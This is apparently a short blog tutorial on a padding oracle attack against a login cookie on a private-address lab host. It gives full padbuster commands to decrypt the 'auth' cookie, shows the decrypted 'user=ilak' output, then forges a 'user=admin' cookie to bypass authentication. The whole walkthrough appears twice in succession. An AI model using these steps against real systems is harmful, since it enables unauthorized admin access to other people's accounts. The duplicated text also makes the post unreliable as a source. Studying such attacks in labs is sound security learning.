This post will show you how to do Oracle Padding attack . By passing the authentication .
First login as normal user then try login as admin.
Now we will try to login as admin.
just refresh the page and block the request . or find current cookie used .
say its Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS
Now open terminal :
padbuster http://192.168.145.162/login.php Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS 8 --cookies auth=Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS --encoding 0
You will get decrypted value like bellow:
[+] Decrypted value (ASCII): user=ilak
[+] Decrypted value (HEX): 757365723D696C616B07070707070707
[+] Decrypted value (Base64): dXNlcj1pbGFrBwcHBwcHBw==
Now we will make like user=admin and encrypt like bellow :
padbuster http://192.168.145.162/login.php Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS 8 --cookies auth=Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS --encoding 0 --plaintext user=admin
You will get the encrypted value like :
BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
Replace with cookie value .
Join me at facebook HERE
First login as normal user then try login as admin.
Now we will try to login as admin.
just refresh the page and block the request . or find current cookie used .
say its Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS
Now open terminal :
padbuster http://192.168.145.162/login.php Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS 8 --cookies auth=Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS --encoding 0
You will get decrypted value like bellow:
[+] Decrypted value (ASCII): user=ilak
[+] Decrypted value (HEX): 757365723D696C616B07070707070707
[+] Decrypted value (Base64): dXNlcj1pbGFrBwcHBwcHBw==
Now we will make like user=admin and encrypt like bellow :
padbuster http://192.168.145.162/login.php Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS 8 --cookies auth=Kgnn5nXxmZoNX9Ub2f04xyXBCZ%2BblpNS --encoding 0 --plaintext user=admin
You will get the encrypted value like :
BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
Replace with cookie value .
Join me at facebook HERE
No comments:
Post a Comment